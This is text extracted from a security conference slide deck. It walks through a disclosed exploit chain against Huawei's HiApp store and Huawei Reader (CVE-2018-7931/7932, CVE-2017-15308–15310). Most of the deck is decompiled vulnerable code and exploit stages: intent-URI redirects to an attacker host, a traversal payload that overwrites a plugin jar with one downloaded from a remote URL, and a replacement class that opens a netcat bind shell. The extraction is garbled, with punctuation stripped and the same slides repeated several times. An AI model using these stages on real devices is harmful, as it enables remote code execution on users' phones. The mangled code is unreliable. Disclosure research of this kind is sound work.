return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 22: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 23: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 24: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 25: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

